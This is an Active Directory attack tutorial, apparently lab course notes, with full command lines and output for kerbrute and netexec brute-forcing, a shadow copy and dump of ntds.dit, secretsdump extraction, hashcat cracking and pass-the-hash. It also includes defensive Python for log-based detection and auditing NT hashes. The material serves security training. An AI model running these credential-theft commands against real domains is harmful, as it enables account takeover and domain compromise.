Attacking Active Directory
We can attempt to extract credentials from Active Directory Domain Services (AD DS) by running dictionary attacks against AD accounts and by dumping hashes from the ntds.dit file.
Once a workstation is joined to a domain, it no longer uses the local SAM database for authentication but instead queries the domain controller (DC) to validate user credentials. The SAM database is still used if you log in locally to the workstation. This means that if we can compromise a workstation that is part of a domain, we may be able to extract credentials for domain users.

Dictionary Attacks
As always, dictionary attacks are noisy and typically easy to detect. However, they can be effective if you have a good wordlist and the target account has a weak password. Also note that many organizations have password policies (typically enforced via Group Policy objects) that require complex passwords, which can make dictionary attacks less effective.
One method of determining usernames is to use a tool like theHarvester, or even LinkedIn, to gather email addresses. Usernames are often the first part of the email address (e.g., jdoe for jdoe@mysite.com).
We can use a tool like kerbrute to perform a dictionary attack against Kerberos on the domain controller. This tool will attempt to authenticate to the DC using a list of usernames and passwords.
Once we have a list of valid usernames, we can attempt to brute-force passwords for those accounts. Here, we will use the popular rockyou.txt wordlist to attempt to brute-force the password for the vagrant user.
┌──(toor㉿blue)-[~/Downloads]
└─$ ./kerbrute_linux_amd64 bruteuser --dc 192.168.86.218 -d homelab.local /usr/share/wordlists/rockyou.txt vagrant
Version: v1.0.3 (9dad6e1) - 01/19/26 - Ronnie Flathers @ropnop
2026/01/19 13:48:38 > Using KDC(s):
2026/01/19 13:48:38 > 192.168.86.218:88
2026/01/19 13:53:15 > [+] VALID LOGIN: vagrant@homelab.local:vagrant
2026/01/19 13:53:15 > Done! Tested 114989 logins (1 successes) in 277.561 seconds
We can also use netexec to brute-force a user's password:
rnemeth@htb[/htb]$ netexec smb 10.129.201.57 -u bwilliamson -p /usr/share/wordlists/fasttrack.txt
SMB 10.129.201.57 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC-PAC) (domain:dac.local) (signing:True) (SMBv1:False)
SMB 10.129.201.57 445 DC01 [-] inlanefrieght.local\bwilliamson:winter2017 STATUS_LOGON_FAILURE
SMB 10.129.201.57 445 DC01 [-] inlanefrieght.local\bwilliamson:winter2016 STATUS_LOGON_FAILURE
SMB 10.129.201.57 445 DC01 [-] inlanefrieght.local\bwilliamson:winter2015 STATUS_LOGON_FAILURE
SMB 10.129.201.57 445 DC01 [-] inlanefrieght.local\bwilliamson:winter2014 STATUS_LOGON_FAILURE
SMB 10.129.201.57 445 DC01 [-] inlanefrieght.local\bwilliamson:winter2013 STATUS_LOGON_FAILURE
SMB 10.129.201.57 445 DC01 [-] inlanefrieght.local\bwilliamson:P@55w0rd STATUS_LOGON_FAILURE
SMB 10.129.201.57 445 DC01 [-] inlanefrieght.local\bwilliamson:P@ssw0rd! STATUS_LOGON_FAILURE
SMB 10.129.201.57 445 DC01 [+] inlanefrieght.local\bwilliamson:P@55w0rd!
<SNIP>
In the example above, netexec uses SMB to attempt to authenticate to the DC with the username bwilliamson and the list of passwords in fasttrack.txt. When it finds a valid password, it prints it to the screen. Note that if an account lockout policy is configured (which is likely these days), repeated failed login attempts may lock the account, so use caution when performing brute-force attacks. Repeated and unexpected account lockouts are almost always a sign of an ongoing brute-force attack, and a sure way to get noticed. Tread lightly.
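The detection side of the two attacks above, as an added example that is not part of the original notes: a DC records a wrong Kerberos password as Security event 4771, a failed NTLM/SMB logon as 4625 and a lockout as 4740, so a per-source sliding window over those events surfaces kerbrute-style bursts, netexec-style sprays and the lockouts the text warns about. The event records, IP addresses and thresholds below are constructed assumptions, not real DC output.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Windows Security log events a DC records for the attacks shown above
KERB_PREAUTH_FAILED = 4771   # wrong Kerberos password (kerbrute against port 88)
LOGON_FAILED = 4625          # failed NTLM/SMB logon (netexec smb)
ACCOUNT_LOCKED_OUT = 4740    # the lockout policy fired

def constructed_events():
    # Constructed sample records (timestamp, event_id, account, source_ip); not real DC output.
    t0 = datetime(2026, 1, 19, 13, 48, 38)
    ev = [(t0 + timedelta(seconds=2 * i), KERB_PREAUTH_FAILED, "vagrant", "192.168.86.50")
          for i in range(12)]                                   # one account, many passwords
    ev += [(t0 + timedelta(seconds=90 + i), LOGON_FAILED, user, "192.168.86.51")
           for i, user in enumerate(["jdoe", "asmith", "bwilliamson", "mjones", "kchen", "rlee"])]
    ev.append((t0 + timedelta(seconds=200), ACCOUNT_LOCKED_OUT, "bwilliamson", "192.168.86.51"))
    ev.append((t0 + timedelta(hours=2), LOGON_FAILED, "jdoe", "192.168.86.77"))  # lone typo
    return ev

def detect(events, window=timedelta(minutes=5), fail_threshold=10, spray_threshold=5):
    # Sliding window of failures per source IP; each source alerts at most once per kind.
    recent, alerted, alerts = defaultdict(deque), set(), []
    for ts, event_id, account, src in sorted(events):
        if event_id == ACCOUNT_LOCKED_OUT:
            alerts.append(("lockout", src, account))
            continue
        if event_id not in (KERB_PREAUTH_FAILED, LOGON_FAILED):
            continue
        q = recent[src]
        q.append((ts, account))
        while ts - q[0][0] > window:           # drop failures older than the window
            q.popleft()
        accounts = {a for _, a in q}
        if len(q) >= fail_threshold and ("bruteforce", src) not in alerted:
            alerted.add(("bruteforce", src))
            alerts.append(("bruteforce", src, ", ".join(sorted(accounts))))
        if len(accounts) >= spray_threshold and ("spray", src) not in alerted:
            alerted.add(("spray", src))
            alerts.append(("spray", src, f"{len(accounts)} accounts"))
    return alerts

if __name__ == "__main__":
    for kind, src, detail in detect(constructed_events()):
        print(f"[{kind}] {src}: {detail}")
```

The same logic works over real events once the four fields are pulled from the 4771/4625/4740 records (the client address in 4771 and 4625, the caller computer in 4740).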
Dumping ntds.dit
The ntds.dit file is the Active Directory database that contains all of the information about the domain, including user accounts and their hashed passwords. If we can obtain a copy of this file, we can attempt to crack the hashes offline using a tool like hashcat or John the Ripper.
We can use evil-winrm to connect to a Windows machine that is part of the domain using the credentials we have obtained:
rnemeth@htb[/htb]$ evil-winrm -i 192.168.86.218 -u vagrant -p 'vagrant'
We can check which groups a user account is a member of:
*Evil-WinRM* PS C:\Users\vagrant\Documents> net groups
Group Accounts for \\
-------------------------------------------------------------------------------
*Cloneable Domain Controllers
*DnsUpdateProxy
*Domain Admins
*Domain Computers
*Domain Controllers
*Domain Guests
*Domain Users
*Enterprise Admins
*Enterprise Key Admins
*Enterprise Read-only Domain Controllers
*Group Policy Creator Owners
*Key Admins
*Protected Users
*Read-only Domain Controllers
*Schema Admins
The command completed with one or more errors.
We can also check the account's password settings and find some other useful information about this user account:
*Evil-WinRM* PS C:\Users\vagrant\Documents> net user vagrant
User name vagrant
Full Name vagrant
Comment vagrant
User's comment
Country/region code 001 (United States)
Account active Yes
Account expires Never
Password last set 1/13/2026 3:32:20 AM
Password expires Never
Password changeable 1/14/2026 3:32:20 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 1/19/2026 6:56:35 PM
Logon hours allowed All
Local Group Memberships *Administrators *Users
Global Group memberships *Domain Users
The command completed successfully.
We can see that the vagrant user is a member of the Domain Admins group, which means we have administrative privileges on the domain. This will allow us to dump the ntds.dit file.
The directory service keeps ntds.dit open while the DC is running, so it cannot be copied directly. Instead, we make a shadow copy of the volume that contains the ntds.dit file using vssadmin:
*Evil-WinRM* PS C:\Users\vagrant\Documents> vssadmin create shadow /for=c:
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2013 Microsoft Corp.
Successfully created shadow copy for 'c:\'
Shadow Copy ID: {f089068a-e156-493c-aa90-d08f78f2f8e9}
Shadow Copy Volume Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
*Evil-WinRM* PS C:\Users\vagrant\Documents>
The location of the ntds.dit file is typically C:\Windows\NTDS\ntds.dit (this can be changed when installing AD DS). We can copy this file from the shadow copy to a location we can access:
*Evil-WinRM* PS C:\NTDS> cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit
1 file(s) copied.
Note: As was the case with SAM, the hashes stored in NTDS.dit are encrypted with a key derived from the boot key stored in the SYSTEM registry hive. To extract the hashes successfully, both files must be downloaded.
We can use secretsdump.py from the Impacket suite to extract the hashes from the ntds.dit file:
rnemeth@htb[/htb]$ impacket-secretsdump -ntds NTDS.dit -system SYSTEM LOCAL
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x62649a98dea282e3c3df04cc5fe4c130
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 086ab260718494c3a503c47d430a92a4
[*] Reading and decrypting hashes from NTDS.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:e6be3fd362edbaa873f50e384a02ee68:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:cbb8a44ba74b5778a06c2d08b4ced802:::
<SNIP>
A faster method: Using NetExec to capture NTDS.dit
Alternatively, we may benefit from using NetExec to accomplish the same steps shown above with a single command. Its ntdsutil module uses VSS to capture and dump the contents of the NTDS.dit file conveniently within our terminal session.
┌──(toor㉿blue)-[~/Downloads]
└─$ netexec smb 192.168.86.218 -u vagrant -p vagrant -M ntdsutil
SMB 192.168.86.218 445 WIN-F78TN8NTHVE [*] Windows 10 / Server 2019 Build 17763 x64 (name:WIN-F78TN8NTHVE) (domain:homelab.local) (signing:True) (SMBv1:False)
SMB 192.168.86.218 445 WIN-F78TN8NTHVE [+] homelab.local\vagrant:vagrant (Pwn3d!)
NTDSUTIL 192.168.86.218 445 WIN-F78TN8NTHVE [*] Dumping ntds with ntdsutil.exe to C:\Windows\Temp\176884951
NTDSUTIL 192.168.86.218 445 WIN-F78TN8NTHVE Dumping the NTDS, this could take a while so go grab a redbull...
SMB 192.168.86.218 445 WIN-F78TN8NTHVE [-] wmiexec: Could not retrieve output file, it may have been detected by AV. If it is still failing, try the 'wmi' protocol or another exec method
NTDSUTIL 192.168.86.218 445 WIN-F78TN8NTHVE [-] Error while dumping NTDS
RESULTS MAY VARY DEPENDING ON ANTIVIRUS/EDR PRESENCE AND CONFIGURATION
Cracking Hashes
Once we have obtained the hashes from the ntds.dit file, we can attempt to crack them using a tool like hashcat or John the Ripper. Here, we will use hashcat to crack the Administrator NT hash with the rockyou.txt wordlist (-m 1000 is hashcat's NTLM mode):
rnemeth@htb[/htb]$ sudo hashcat -m 1000 64f12cddaa88057e06a81b54e73b949b /usr/share/wordlists/rockyou.txt
64f12cddaa88057e06a81b54e73b949b:Password1
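Added example, not from the original notes, tying the secretsdump output format above to the cracking step: the NT hash is MD4 over the UTF-16LE password with no salt, which is why a wordlist attack works and why an offline audit of a dump can flag blank passwords, hashes on a banned-password list and hash reuse between accounts (identical NT hashes mean identical passwords). The Administrator and Guest lines reuse the hashes shown on this page; svc_backup and the banned list are constructed assumptions.

```python
import struct
def md4(data: bytes) -> bytes:
    # Minimal MD4 (RFC 1320); hashlib's "md4" is often unavailable under OpenSSL 3.
    mask = 0xFFFFFFFF
    rotl = lambda v, s: ((v << s) | (v >> (32 - s))) & mask
    rounds = (  # (boolean function, additive constant, X[] index order, shift amounts)
        (lambda x, y, z: (x & y) | (~x & z), 0, range(16), (3, 7, 11, 19)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999,
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1,
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        x, v = struct.unpack("<16I", msg[off:off + 64]), state[:]
        for fn, k, order, shifts in rounds:
            for i, j in enumerate(order):
                a, b, c, d = (-i) % 4, (1 - i) % 4, (2 - i) % 4, (3 - i) % 4
                v[a] = rotl((v[a] + fn(v[b], v[c], v[d]) + x[j] + k) & mask, shifts[i % 4])
        state = [(s + t) & mask for s, t in zip(state, v)]
    return struct.pack("<4I", *state)
def nt_hash(password: str) -> str:
    # The NT hash stored in ntds.dit is MD4 over the UTF-16LE password, unsalted.
    return md4(password.encode("utf-16le")).hex()
def audit_dump(lines, banned_passwords):
    # Walk secretsdump "user:rid:lmhash:nthash:::" lines; flag blank passwords, banned passwords and reuse.
    banned = {nt_hash(p): p for p in banned_passwords}
    seen, findings = {}, []
    for line in lines:
        parts = line.strip().split(":")
        if len(parts) < 4 or len(parts[3]) != 32: continue  # status lines such as "[*] Dumping ..."
        user, nt = parts[0], parts[3].lower()
        if nt == nt_hash(""):
            findings.append((user, "blank password"))
        if nt in banned:
            findings.append((user, f"banned password {banned[nt]!r}"))
        if nt in seen:
            findings.append((user, f"same NT hash as {seen[nt]}"))
        seen.setdefault(nt, user)
    return findings
# Constructed sample: first two hash lines are from this page, svc_backup is invented to show reuse.
SAMPLE_DUMP = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1105:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
""".splitlines()
```

Running audit_dump(SAMPLE_DUMP, ["Password1", "Winter2017"]) reports Guest's blank password, the banned "Password1" on Administrator, and svc_backup sharing Administrator's hash; the aad3b435... LM field is the empty LM hash and carries no password.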
Pass the Hash (PtH) considerations
Even when a hash cannot be cracked, we can still use it to authenticate to a system with a type of attack called Pass-the-Hash (PtH). A PtH attack takes advantage of the NTLM authentication protocol, which accepts the NT hash itself as the proof of identity: instead of username:clear-text password as the login format, we use username:password hash. Here is an example of how this would work:
rnemeth@htb[/htb]$ evil-winrm -i 10.129.201.57 -u Administrator -H 64f12cddaa88057e06a81b54e73b949b